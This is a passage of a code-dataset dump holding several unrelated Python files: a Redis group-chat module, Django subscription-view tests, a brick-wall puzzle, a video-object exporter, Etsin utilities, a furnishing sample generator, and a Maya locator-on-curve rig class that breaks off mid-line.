pipe.zadd('chat:' + chat_id, recipientsd)\n for r in recipients:\n pipe.zadd('seen:' + r, {chat_id: 0})\n pipe.execute()\n chat_id = send_message(sender, message, chat_id)\n fetch_pending_message(sender)\n return chat_id\n\n\ndef send_message(sender, message, chat_id):\n \"\"\" 发送消息\n @param string sender: 发送者\n @param string message: 消息\n @param int chat_id: 群号\n @return:\n \"\"\"\n\n identifier = DistributedLock.acquire_lock('chat:' + str(chat_id))\n if not identifier:\n raise Exception('Could not get the lock')\n try:\n message_id = conn.incr('mid:' + str(chat_id))\n message_info = {\n 'id': message_id,\n 'message': message,\n 'sender': sender,\n 'time': time.time()\n }\n conn.zadd('msg:' + str(chat_id), {json.dumps(message_info): message_id})\n finally:\n DistributedLock.release_lock('chat:' + str(chat_id), identifier)\n return chat_id\n\n\ndef fetch_pending_message(recipient):\n \"\"\" 读取消息\n\n @param string recipient: 接收人\n @return:\n \"\"\"\n\n seen = conn.zrange('seen:' + recipient, 0, -1, withscores=True)\n pipe = conn.pipeline(True)\n for chat_id, seen_id in seen:\n pipe.zrangebyscore('msg:' + chat_id, seen_id + 1, 'inf')\n # 获取要读取消息人各个群组的所有未读消息\n chat_info = zip(seen, pipe.execute())\n result = []\n for i, ((chat_id, seen_id), messages) in enumerate(chat_info):\n if not messages:\n continue\n messages[:] = map(json.loads, messages)\n mid = messages[-1]['id']\n # 更新已读消息条数\n pipe.zadd('chat:' + chat_id, {recipient: mid})\n pipe.zadd('seen:' + recipient, {chat_id: mid})\n # 获取该群组所有人最少的未读消息,将所有人都读过的消息进行异常\n pipe.zrange('chat:' + chat_id, 0, 0, withscores=True)\n min_seen = int(pipe.execute()[-1][0][1])\n pipe.zremrangebyscore('msg:' + chat_id, 0, min_seen)\n result.append((chat_id, messages))\n pipe.execute()\n return result\n\n\ndef join_chat(chat_id, user_id):\n \"\"\" 加入群组\n\n @param int chat_id: 群组id\n @param string user_id: 用户\n @return:\n \"\"\"\n\n mid = int(conn.get('mid:' + chat_id))\n pipe = conn.pipeline(True)\n pipe.zadd('chat:' + str(chat_id), {user_id: mid})\n pipe.zadd('seen:' + user_id, {chat_id: mid})\n pipe.execute()\n\n\ndef leave_chat(chat_id, user_id):\n \"\"\" 移出群聊\n\n @param int chat_id: 群组id\n @param string user_id: 用户\n @return:\n \"\"\"\n pipe = conn.pipeline(True)\n pipe.zrem('chat:' + str(chat_id), user_id)\n pipe.zrem('seen:' + user_id, str(chat_id))\n pipe.zcard('chat:' + str(chat_id))\n if not pipe.execute()[-1]:\n conn.delete('msg:' + str(chat_id), 'mid:' + str(chat_id))\n else:\n oldest = conn.zrange('chat:' + str(chat_id), 0, 0, withscores=True)\n conn.zremrangebyscore('msg:' + str(chat_id), 0, oldest[0][1])\n\n\nif __name__ == '__main__':\n # create_chat('zhangshuai', ['sun1', 'sun2', 'sun4'], '小老婆们')\n # send_message('sunsun2', '老公我爱你,么么哒', 1)\n print(fetch_pending_message('sun1'))\n # fetch_pending_message('sun4')\n # fetch_pending_message('sun2')\n # fetch_pending_message('zhangshuai')\n # join_chat('1', 'dasunsun2')\n # leave_chat('1', 'dasunsun1')\n","sub_path":"Unit6/Chat.py","file_name":"Chat.py","file_ext":"py","file_size_in_byte":4012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"519783370","text":"import json\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.urlresolvers import reverse\nfrom django.test import TestCase\n\nfrom base_app import http_statuses as http\nfrom . import messages as mess\n\nUser = get_user_model()\nUsers = User.objects\n\nCORRECT_TEST_CHANNEL_ID = 'UCq-d_I6u6kMF2PssEcHHEkA'\nCORRECT_TEST_CHANNEL_LINK = 'https://www.youtube.com/channel/UCq-d_I6u6kMF2PssEcHHEkA'\n\nFORBIDDEN_TEST_CHANNEL_ID = 'UCFcqTyFdQcB4QbjM0FrZivw'\nFORBIDDEN_TEST_CHANNEL_LINK = 'https://www.youtube.com/channel/UCFcqTyFdQcB4QbjM0FrZivw'\n\n\nclass YoutubeSubscriptionsTests(TestCase):\n \"\"\"\n This TestCase tests youtube_subscriptions view.\n \"\"\"\n\n def setUp(self):\n self.request = {\n 'path': reverse('youtube subscriptions'),\n 'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest',\n }\n self.email = 'a@a.ru'\n self.password = 'asdfgh'\n self.user = Users.create(email=self.email, raw_password=self.password)\n self.client.login(email=self.email, password=self.password)\n\n def test_account_not_connected(self):\n self.user.youtube_disconnect()\n self.user.save()\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.YOUTUBE_NOT_CONNECTED)\n self.assertEqual(resp_json['status'], http.FORBIDDEN)\n\n def test_account_not_exists(self):\n self.user.youtube_connect('неверный айди')\n self.user.save()\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.CHANNEL_NOT_FOUND)\n self.assertEqual(resp_json['status'], http.NOT_FOUND)\n\n def test_forbidden_subs(self):\n self.user.youtube_connect(FORBIDDEN_TEST_CHANNEL_ID)\n self.user.save()\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.YOUTUBE_SUBS_FORBIDDEN)\n self.assertEqual(resp_json['status'], http.FORBIDDEN)\n\n def test_correct(self):\n self.user.youtube_connect(CORRECT_TEST_CHANNEL_ID)\n self.user.save()\n resp = self.client.post(**self.request)\n self.assertTemplateUsed(resp,\n 'subscriptions/youtube_subscriptions.html')\n\n\nclass ToggleSubscriptionTests(TestCase):\n \"\"\"\n This TestsCase tests toggle_subscription view.\n \"\"\"\n\n def setUp(self):\n \"\"\"\n This function initializes two iterating users,\n and set ajax header to request args.\n \"\"\"\n # ajax request\n self.request = {\n 'path': reverse('toggle subscription'),\n 'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest',\n }\n password = 'asdfgh'\n email = 'a@a.ru'\n self.user_from = Users.create(email=email, raw_password=password)\n self.client.login(email=email, password=password)\n self.user_to = Users.create(email='b@b.ru')\n\n def test_empty_request(self):\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.FIELD_REQUIRED)\n self.assertEqual(resp_json['status'], http.BAD_REQUEST)\n\n def test_not_int(self):\n self.request['data'] = {'user_to': 'not int'}\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.USER_ID_NOT_EXISTS)\n self.assertEqual(resp_json['status'], http.BAD_REQUEST)\n\n def test_not_exists(self):\n self.request['data'] = {'user_to': self.user_to.id + 1}\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertEqual(data['message'], mess.USER_ID_NOT_EXISTS)\n self.assertEqual(resp_json['status'], http.BAD_REQUEST)\n\n def test_activate(self):\n self.request['data'] = {'user_to': self.user_to.id}\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertNotIn('message', data)\n self.assertTrue(data['is_subscribed'])\n self.assertEqual(data['subscribe_text'], mess.UNSUBSCRIBE)\n self.assertEqual(resp_json['status'], http.OK)\n\n def test_deactivate(self):\n self.user_from.outbound_subs.create(user_to=self.user_to)\n self.request['data'] = {'user_to': self.user_to.id}\n resp = self.client.post(**self.request)\n resp_json = json.loads(resp.content.decode())\n data = resp_json['data']\n self.assertNotIn('message', data)\n self.assertFalse(data['is_subscribed'])\n self.assertEqual(data['subscribe_text'], mess.SUBSCRIBE)\n self.assertEqual(resp_json['status'], http.OK)\n\n\nclass CheckNewYoutubeSubsTests(TestCase):\n def setUp(self):\n self.user = Users.create()\n self.subs1 = ['1', '2', '3']\n self.subs2 = ['4', '3', '1']\n self.subs3 = ['3', '1', '2']\n\n def test_not_viewed_not_new(self):\n self.user.viewed_youtube_subs = []\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs([])\n self.assertFalse(self.user.has_new_youtube_subs)\n\n def test_not_viewed_has_new(self):\n self.user.viewed_youtube_subs = []\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs(self.subs1)\n self.assertTrue(self.user.has_new_youtube_subs)\n\n def test_has_viewed_not_new(self):\n self.user.viewed_youtube_subs = self.subs1\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs([])\n self.assertFalse(self.user.has_new_youtube_subs)\n\n def test_has_viewed_has_new(self):\n self.user.viewed_youtube_subs = self.subs1\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs(self.subs2)\n self.assertTrue(self.user.has_new_youtube_subs)\n\n def test_shuffle(self):\n self.user.viewed_youtube_subs = self.subs1\n self.assertFalse(self.user.has_new_youtube_subs)\n self.user.check_new_youtube_subs(self.subs3)\n self.assertFalse(self.user.has_new_youtube_subs)\n","sub_path":"subscriptions/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"90687654","text":"# -*- coding: utf-8 -*-\r\n\r\n#练习题4-穿墙而过\r\n\r\n\r\nBrick=eval(input('输入:'))\r\n#print(len(Brick))\r\nBrick_add=Brick\r\nTem_sum=0\r\nfor Brick_item in Brick_add:\r\n Sum_item=0\r\n for i in range(len(Brick_item)):\r\n Sum_item+=Brick_item[i]\r\n Brick_item[i]=Sum_item\r\n Tem_sum=Sum_item\r\n\r\nBrick_list=[]\r\nfor Brick_item in Brick_add:\r\n for i in Brick_item:\r\n if i!=Tem_sum:\r\n Brick_list.append(i)\r\n\r\n\r\nMinus=max(Brick_list.count(x) for x in set(Brick_list))\r\nprint(Tem_sum-Minus)\r\n","sub_path":"上机练习/q4.py","file_name":"q4.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"51654643","text":"import sys\nfrom video import Video\nfrom visualobjects import VisualObject\nimport util\nimport os\nimport processframe\n\nif __name__ == \"__main__\":\n videopath = sys.argv[1]\n objdir = sys.argv[2]\n outdir = sys.argv[3]\n outfile = outdir + \"/visualobj.json\"\n if not os.path.exists(os.path.abspath(outdir)):\n os.makedirs(os.path.abspath(outdir))\n outfile = open(outfile, \"w\")\n \n video = Video(videopath)\n list_of_objs = VisualObject.objs_from_file(video, objdir)\n \n outfile.write(\"{\\n \\\"data\\\":[\\n\")\n count = 0\n nobjs = len(list_of_objs)\n for obj in list_of_objs:\n count += 1\n mask = processframe.fgmask(obj.img, threshold=200)\n aimg = processframe.alphaimage(obj.img, mask)\n# util.showimages([aimg])\n util.saveimage(aimg, outdir, obj.imgpath)\n h, w = obj.img.shape[0:2]\n startt = video.fid2sec(obj.start_fid)\n outfile.write(\"\\\n {\\n \\\n \\\"filename\\\": \\\"%s\\\",\\n \\\n \\\"x\\\": %i,\\n \\\n \\\"y\\\": %i,\\n \\\n \\\"h\\\": %i,\\n \\\n \\\"w\\\": %i,\\n \\\n \\\"time\\\": %i\\n \\\n }\" %(obj.imgpath, obj.tlx, obj.tly, h, w, startt))\n if count != nobjs:\n outfile.write(\",\\n\")\n \n outfile.write(\"\\n]\\n}\")\n outfile.close()\n","sub_path":"Scripts/notevideo_objs.py","file_name":"notevideo_objs.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"195042207","text":"# This file is part of the Etsin service\n#\n# Copyright 2017-2018 Ministry of Education and Culture, Finland\n#\n# :author: CSC - IT Center for Science Ltd., Espoo Finland \n# :license: MIT\n\n\"\"\"Various utils and constants\"\"\"\n\nimport json\nimport os\nfrom datetime import datetime\nimport pytz\nfrom dateutil import parser\n\n\nACCESS_TYPES = {\n 'open': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/open',\n 'login': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/login',\n 'permit': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/permit',\n 'embargo': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/embargo',\n 'restricted': 'http://uri.suomi.fi/codelist/fairdata/access_type/code/restricted'\n}\n\nSAML_ATTRIBUTES = {\n 'first_name': 'urn:oid:2.5.4.42',\n 'last_name': 'urn:oid:2.5.4.4',\n 'email': 'urn:oid:0.9.2342.19200300.100.1.3',\n 'haka_id': 'urn:oid:1.3.6.1.4.1.5923.1.1.1.6',\n 'haka_org_id': 'urn:oid:1.3.6.1.4.1.25178.1.2.9',\n 'haka_org_name': 'urn:oid:1.3.6.1.4.1.16161.4.0.88',\n 'CSC_username': 'urn:oid:1.3.6.1.4.1.16161.4.0.53',\n 'idm_groups': 'urn:oid:1.3.6.1.4.1.8057.2.80.26'\n}\n\nDATA_CATALOG_IDENTIFIERS = {\n 'ida': 'urn:nbn:fi:att:data-catalog-ida',\n 'att': 'urn:nbn:fi:att:data-catalog-att'\n}\n\ndef get_log_config(log_file_path, log_lvl):\n \"\"\"\n Function to get the logging configuration from utils.py\n\n Arguments:\n log_file_path {string} -- The log file path.\n log_lvl {string} -- The logging level\n\n Returns:\n [dict] -- Dict containgin the logging configuration.\n\n \"\"\"\n if (log_file_path and log_lvl):\n CONFIG = {\n 'version': 1,\n 'formatters': {\n 'standard': {\n 'format': '--------------\\n[%(asctime)s] [%(process)d] %(levelname)s in %(filename)s:%(lineno)d: %(message)s',\n 'datefmt': '%Y-%m-%d %H:%M:%S %z',\n }\n },\n 'handlers': {\n 'file': {\n 'class': 'logging.handlers.RotatingFileHandler',\n 'formatter': 'standard',\n 'filename': log_file_path,\n 'maxBytes': 10000000,\n 'mode': 'a',\n 'backupCount': 30\n },\n 'console': {\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard',\n 'stream': 'ext://sys.stdout'\n }\n },\n 'root': {\n 'level': log_lvl,\n 'handlers': ['file', 'console']\n }\n }\n return CONFIG\n return False\n\n\ndef executing_travis():\n \"\"\"Returns True whenever code is being executed by travis\"\"\"\n return True if os.getenv('TRAVIS', False) else False\n\n\ndef write_json_to_file(json_data, filename):\n \"\"\"\n Write JSON data to file.\n\n :param json_data:\n :param filename:\n \"\"\"\n with open(filename, \"w\") as output_file:\n json.dump(json_data, output_file)\n\n\ndef json_or_empty(response):\n \"\"\"\n Return response JSON as python dict or empty dict.\n\n :param response:\n :return:\n \"\"\"\n response_json = {}\n try:\n response_json = response.json()\n except Exception:\n pass\n return response_json\n\n\ndef remove_keys_recursively(obj, fields_to_remove):\n \"\"\"\n Remove specified keys recursively from a python object (dict or list)\n\n :param obj:\n :param fields_to_remove:\n :return:\n \"\"\"\n if isinstance(obj, dict):\n obj = {\n key: remove_keys_recursively(value, fields_to_remove) for key, value in obj.items()\n if key not in fields_to_remove\n }\n elif isinstance(obj, list):\n obj = [remove_keys_recursively(item, fields_to_remove) for item in obj if item not in fields_to_remove]\n\n return obj\n\n\ndef leave_keys_in_dict(dict_obj, fields_to_leave):\n \"\"\"\n Removes the key-values from dict_obj, for which key is NOT listed in fields_to_leave.\n\n NOTE: Is not recursive\n\n :param dict_obj:\n :param fields_to_leave:\n :return:\n \"\"\"\n for key in list(dict_obj):\n if key not in fields_to_leave:\n del dict_obj[key]\n\n\ndef _parse_timestamp_string_to_tz_aware_datetime(timestamp_str):\n if not isinstance(timestamp_str, str):\n raise ValueError(\"Timestamp must be a string\")\n\n try:\n dt = parser.parse(timestamp_str)\n if dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None:\n dt = pytz.timezone('Europe/Helsinki').localize(dt)\n return dt\n except Exception:\n raise ValueError(\"Unable to parse timestamp: {0}\".format(timestamp_str))\n\n\ndef tz_now_is_later_than_timestamp_str(timestamp_str):\n \"\"\"\n Is timestamp_str later in time than current time.\n\n :param timestamp_str:\n :return:\n \"\"\"\n datetime_obj = _parse_timestamp_string_to_tz_aware_datetime(timestamp_str)\n return datetime.now(tz=pytz.timezone('Europe/Helsinki')) >= datetime_obj\n\ndef datetime_to_header(datetime_str):\n \"\"\"\n Modifie ISO 8601 datetime format to HTTP datetime (RFC2616).\n\n The function does also work with some other formats and without\n tz, but it is not recommended.\n\n Arguments:\n datetime_str [string] -- Datetime string represented in the ISO 8601 format (ex. 2020-01-23T14:12:44+00:00)\n Returns:\n [string] -- Datetime string in HTTP datetime format (ex. Wed, 21 Oct 2015 07:28:00 GMT)\n\n \"\"\"\n try:\n assert isinstance(datetime_str, str), 'datetime_str must be of type string.'\n datetime_obj_local = parser.parse(datetime_str)\n datetime_obj_GMT = datetime_obj_local.astimezone(pytz.utc)\n HTTP_datetime = datetime_obj_GMT.strftime('%a, %d %b %Y %H:%M:%S GMT')\n return HTTP_datetime\n except Exception:\n return False\n\n\ndef sort_array_of_obj_by_key(obj_array, obj_key, obj_nested_key=False):\n \"\"\"\n Sort the objects in an array by using the value of an object key, or if needed, the value of a nested object key contained inside an object pointed to by an object key\n\n :param obj_array: Object array to be sorted\n :obj_key: Object key based on which to sort the object array, or a pointer key to a nested object where the sorting key is located\n :obj_nested_key: Object key based on which to sort the object array, if it is contained below the main level of the sortable object\n \"\"\"\n try:\n if obj_array and obj_key:\n obj_array.sort(key=lambda x: x.get(obj_key, {}).get(obj_nested_key) if obj_nested_key else x.get(obj_key))\n except Exception:\n pass\n\n\ndef slice_array_on_limit(array, limit):\n \"\"\"\n If array contains more items than the limit, return an array containing items up until the limit\n\n :param array:\n :limit: integer\n \"\"\"\n if array and len(array) > limit:\n return array[0:limit]\n return array\n\n\nclass FlaskService:\n \"\"\"Use as base class for external dependency services\"\"\"\n\n def __init__(self, app):\n \"\"\"Init FlaskService\"\"\"\n if app.testing or executing_travis():\n self.is_testing = True\n else:\n self.is_testing = False\n","sub_path":"etsin_finder/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7193,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"141515934","text":"import argparse\nimport pickle\nfrom concurrent.futures import ProcessPoolExecutor\n\nimport tqdm\n\nfrom src.constraints import RoomConstraint\nfrom src.furnishing.furniture_construction import *\nfrom src.furnishing.room_utils import get_example_room\n\nargument_parser = argparse.ArgumentParser()\nargument_parser.add_argument('number_of_samples', type=int, help='Number of samples to generate')\nargument_parser.add_argument('output_path', help='File path to save samples in *.pkl format')\nargument_parser.add_argument('checkpoint', type=int, help='Number of checkpoint break')\nargs = argument_parser.parse_args()\n\n\ndef generate_example_solutions(room, constraint, number_of_samples, output_path, checkpoint_number):\n features = len(room.params_to_optimize)\n features_flatten = len(room.params_to_optimize.flatten())\n boundaries = [(.13, .86), (.13, .86), (-0.5, 0.5)] * features\n boundaries = np.array(boundaries)\n correct_solutions = []\n tasks = []\n with ProcessPoolExecutor(max_workers=8) as p:\n for _ in tqdm.tqdm(range(number_of_samples)):\n tasks.append(p.submit(generate_sample, boundaries, features_flatten, constraint))\n\n i = 0\n for task in tqdm.tqdm(tasks):\n correct_solutions.append(task.result())\n i += 1\n if i % checkpoint_number == 0:\n with open(output_path, 'wb') as f:\n pickle.dump(correct_solutions, f, pickle.HIGHEST_PROTOCOL)\n\n with open(output_path, 'wb') as f:\n pickle.dump(correct_solutions, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef generate_sample(boundaries, features_flatten, constraint):\n sample = np.random.uniform(boundaries[:, 0], boundaries[:, 1], size=(1, features_flatten))\n try:\n while not constraint.check(sample):\n sample = np.random.uniform(boundaries[:, 0], boundaries[:, 1], size=(1, features_flatten))\n except:\n return generate_sample(boundaries, features_flatten, constraint)\n return sample\n\n\ndef main():\n room = get_example_room()\n generate_example_solutions(room, RoomConstraint(room), args.number_of_samples, args.output_path, args.checkpoint)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/furnishing/samples_generator.py","file_name":"samples_generator.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"330883480","text":"# coding=utf-8\r\n'''\r\n커브위에 존재하는 로케이터 생성\r\n'''\r\n__author__ = 'alfred'\r\n\r\nimport pymel.all as pm\r\n\r\nclass LocatorOnCurve(object):\r\n '''\r\n :parameters:\r\n curve , # 커브이름\r\n parameter = 0.5, # 커브 상의 위치\r\n name = None # 이름을 명시할 경우 해당이름으로 그렇지 않으면, locatorShape이 'locator'일땐 'locOnCrv#', 'group'일땐 'grpOnCrv#'\r\n turnOnPercentage = False, # curvePoint를 값으로? 아님. percentage로 할건가? *주의 : percentage로 한다고 해서 커브의 비율로 계한하는게 아님.\r\n rotate = None, # None, aim, orient 중하나\r\n aimVector ='x', # x, y, z, -x, -y, -z, vector 중 하나\r\n upVector ='y', # x, y, z, -x, -y, -z, vector 중 하나\r\n worldAimType = 'tangent', # tangent, normal, vector, object,\r\n worldUpType = 'curverotation', # tangent, normal, scene, vector, object, objectrotation, curverotation\r\n worldAimVector ='x', # worldAimType 이 scene, vector 일때만 유효.\r\n worldUpVector ='y', # worldUpType 이 scene, vector 일때만 유효.\r\n aimObject = None, # worldAimType 이 object, objectrotation 일때만 유효.\r\n worldUpObject = None, # worldUpType 이 object, objectrotation 일때만 유효.\r\n locatorShape ='locator', # locator, group 중 하나\r\n vectorShape ='group', # locator, group 중 하나\r\n\r\n :TODO : worldAimType 에 objectrotation, curverotation 사용 할 수 있도록 방법 찾아야함.\r\n\r\n :sample:\r\n # sample 1:\r\n curve = pm.curve( d=3, p=[ (5.398530435027274, 0.0, 2.636910065983344), (4.344566726592057, 0.0, 3.517847071376655), (2.2366393097216077, 0.0, 5.279721082163249), (-3.343728636037937, 0.0, 2.716482506849595), (-0.22912241191149801, 0.0, -4.813534894925304), (-0.5614162589497707, 0.0, -9.402385791812858), (-3.979692990558796, 0.0, -9.30078556056116), (-5.68883135636331, 0.0, -9.249985444935318) ], k=[ 0.0, 0.0, 0.0, 1.0, 2.0, 3.0, 4.0, 5.0, 5.0, 5.0 ] )\r\n upLoc = pm.spaceLocator()\r\n upLoc.ty.set(10)\r\n LocatorOnCurve( curve, parameter=1.0, rotate=None ) # 로테이션 리깅은 안. 제일 빠름.\r\n LocatorOnCurve( curve, parameter=3.0, rotate='orient' ) # 로테이션(Orient)은 커브의 트랜스폼을 사용.\r\n LocatorOnCurve( curve, parameter=2.0, rotate='aim' ) # 로테이션(aim) worldUpType을 명시하지 않을경우, aim은 커브의 tangent crv의 rotation을 up으로 사용\r\n LocatorOnCurve( curve, parameter=0.5, rotate='aim', worldUpType='object', worldUpObject=upLoc )\r\n\r\n :version:\r\n 2014-04-27 : doc 수정\r\n 2014-09-24 : 파라메터 조정, doc 수정\r\n '''\r\n\r\n def __init__(self, *args, **kwargs):\r\n if args:\r\n pm.select(args)\r\n\r\n curves = pm.filterExpand( sm=9, expand=True ) # Nurbs Curves\r\n cps = pm.filterExpand( sm=39, expand=True ) # Curve Parameter Points\r\n eps = pm.filterExpand( sm=30, expand=True ) # Edit Points\r\n cvs = pm.filterExpand( sm=28, expand=True ) # Control Vertices (CVs)\r\n knots = pm.filterExpand( sm=40, expand=True ) # Curve Knot\r\n\r\n #print args\r\n #print curves, cps, eps, cvs, knots\r\n\r\n # Nurbs Curves\r\n if curves:\r\n self.curve = pm.PyNode( curves[0] )\r\n self.param = kwargs.get( 'parameter', kwargs.get( 'p', 0.5))\r\n\r\n # Curve Parameter Points\r\n if cps:\r\n curveStr, paramStr = cps[0].split('.u[')\r\n self.curve = pm.PyNode( curveStr )\r\n self.param = float( paramStr[:-1] )\r\n\r\n # Edit Points\r\n if eps:\r\n # 커브쉐입 이름 가져옴\r\n curve = pm.PyNode( eps[0].split('.ep[')[0] )\r\n epNum = int( eps[0].split('.ep[')[1][:-1] ) # 이름에서 순서만 따옴.\r\n\r\n #\r\n # knotValue들이 parameter값들로 추정됨.\r\n #\r\n # knotValue( parameter )값 가져옴.\r\n # degree가 1일경우엔 : editPoint의순서와 knotValue의 순서가 1:1로 매핑됨.\r\n # 2이상일경우 : editPoint degree-1부터 -(degree-1)\r\n #\r\n degree = curve.degree() # degree\r\n knotValues = curve.getKnots()\r\n if not degree == 1:\r\n knotValues = knotValues[ degree-1 : -(degree-1) ] # degree가 1이면 어레이 조정\r\n param = knotValues[ epNum ]\r\n\r\n self.curve = curve\r\n self.param = param\r\n\r\n #print self.curve, self.param\r\n\r\n self.name = kwargs.get( 'name', kwargs.get( 'n', 'xformOnCrv#'))\r\n self.turnOnPercentage= kwargs.get( 'turnOnPercentage', kwargs.get( 'top', False))\r\n\r\n self.locatorShape = kwargs.get( 'locatorShape', kwargs.get( 'shape', 'locator')) # locator, group 중 하나\r\n self.vectorShape ='group' # locator, group 중 하나\r\n\r\n #\r\n # 로케이터 회전 형식 : None, aim, orient 중하나\r\n #\r\n self.rotate = kwargs.get( 'rotate', kwargs.get( 'r', None))\r\n\r\n # 로케이터 aim축 : x, y, z, -x, -y, -z, vector 중 하나\r\n self.aimVector = self._strToVec( kwargs.get( 'aimVector', kwargs.get( 'aim', 'x')) )\r\n\r\n # 로케이터 up축 : x, y, z, -x, -y, -z, vector 중 하나\r\n self.upVector = self._strToVec( kwargs.get( 'upVector', kwargs.get( 'up', 'y')) )\r\n\r\n # 로케이터 aim축 대상 : tangent, normal, vector, object 중 하나\r\n self.worldAimType = kwargs.get( 'worldAimType', kwargs.get( 'waimt', 'tangent'))\r\n\r\n # 로케이터 up축 대상: tangent, normal, scene, vector, object, objectrotation, curverotation 중 하나\r\n self.worldUpType = kwargs.get( 'worldUpType', kwargs.get( 'wupt', 'curverotation'))\r\n\r\n self.worldAimVector = self._strToVec( kwargs.get( 'worldAimVector', kwargs.get( 'waim', 'x')) ) # x, y, z, -x, -y, -z, vector 중 하나, worldAimType 이 scene, vector 일때만 유효.\r\n self.worldUpVector = self._strToVec( kwargs.get( 'worldUpVector', kwargs.get( 'wup', 'y')) ) # x, y, z, -x, -y, -z, vector 중 하나, worldUpType 이 scene, vector 일때만 유효.\r\n self.worldAimObject = kwargs.get( 'aimObject', kwargs.get( 'wao', None)) # worldAimType 이 object, objectrotation 일때만 유효.\r\n self.worldUpObject = kwargs.get( 'worldUpObject', kwargs.get( 'wuo', None)) # worldUpType 이 object, objectrotation 일때만 유효.\r\n\r\n self.create()\r\n\r\n def create(self):\r\n ''' 로케이터 생성 '''\r\n self.positionRig()\r\n if self.rotate == 'aim':\r\n self.aimRig()\r\n elif self.rotate == 'orient':\r\n self.orientRig()\r\n\r\n pm.select( self.locator)\r\n\r\n def positionRig(self):\r\n #\r\n # 로케이터 생성\r\n #\r\n LOC = None\r\n if self.locatorShape=='locator':\r\n LOC = pm.spaceLocator( n='locOnCrv#')\r\n else:\r\n LOC = pm.group( n='grpOnCrv#', em=True)\r\n\r\n if self.name:\r\n LOC.rename( self.name )\r\n\r\n LOC.addAttr( 'parameter', sn='pr', dv=self.param, keyable=True )\r\n LOC.addAttr( 'turnOnPercentage', sn='top', dv=self.turnOnPercentage, at='bool', keyable=True )\r\n LOC.it.set(False)\r\n\r\n #\r\n # pointOnCurve 리깅\r\n #\r\n pntOnCrv = pm.PyNode( pm.pointOnCurve( self.curve, parameter=self.param, ch=True ) )\r\n pntOnCrv.turnOnPercentage.set(True)\r\n\r\n pntOnCrv.setAttr('parameter', keyable=True)\r\n pntOnCrv.setAttr('turnOnPercentage', keyable=True)\r\n\r\n pntOnCrv.rename( LOC+'_POC' )\r\n\r\n #\r\n # Position 리깅\r\n #\r\n LOC.parameter >> pntOnCrv.parameter\r\n LOC.turnOnPercentage >> pntOnCrv.turnOnPercentage\r\n pntOnCrv.position >> LOC.t\r\n\r\n self.locator = LOC\r\n self.pointOnCurve = pntOnCrv\r\n\r\n def aimRig(self):\r\n aimVector = self.aimVector\r\n upVector = self.upVector\r\n worldAimVector = self.worldAimVector\r\n worldUpVector = self.worldUpVector\r\n LOC = self.locator\r\n pntOnCrv = self.pointOnCurve\r\n\r\n # -------------------------------------\r\n #\r\n # aimConstraint : 생성\r\n #\r\n # -------------------------------------\r\n aimConst = pm.createNode( 'aimConstraint', p=LOC )\r\n aimConst.aimVector.set( aimVector )\r\n aimConst.upVector .set( upVector )\r\n\r\n # -------------------------------------\r\n #\r\n # aimConstraint : LOC --> aimConstraint\r\n #\r\n # -------------------------------------\r\n LOC.translate >> aimConst.constraintTranslate\r\n LOC.rotateOrder >> aimConst.constraintRotateOrder\r\n LOC.rotatePivot >> aimConst.constraintRotatePivot\r\n LOC.rotatePivotTranslate >> aimConst.constraintRotateTranslate\r\n LOC.parentInverseMatrix[0] >> aimConst.constraintParentInverseMatrix\r\n\r\n aimConst.constraintRotate >> LOC.r\r\n\r\n # 컨트르레인 어트리뷰트 잠금\r\n for attr in ['tx','ty','tz', 'rx','ry','rz', 'sx','sy','sz', 'v']:\r\n pm.setAttr( aimConst + '.' + attr, keyable=False, lock=True, channelBox=False )\r\n\r\n # -------------------------------------\r\n #\r\n # aimConstraint : worldAimType\r\n #\r\n # -------------------------------------\r\n aimConst.target[0].targetWeight.set(1)\r\n\r\n if self.worldAimType=='tangent':\r\n pntOnCrv.addAttr( 'worldTangent', sn='wt', at='double3')\r\n pntOnCrv.addAttr( 'worldTangentX', sn='wtx', at='double', p='worldTangent')\r\n pntOnCrv.addAttr( 'worldTangentY', sn='wty', at='double', p='worldTangent')\r\n pntOnCrv.addAttr( 'worldTangentZ', sn='wtz', at='double', p='worldTangent')\r\n\r\n # 덧셈노드\r\n plus_wt = pm.createNode( 'plusMinusAverage', 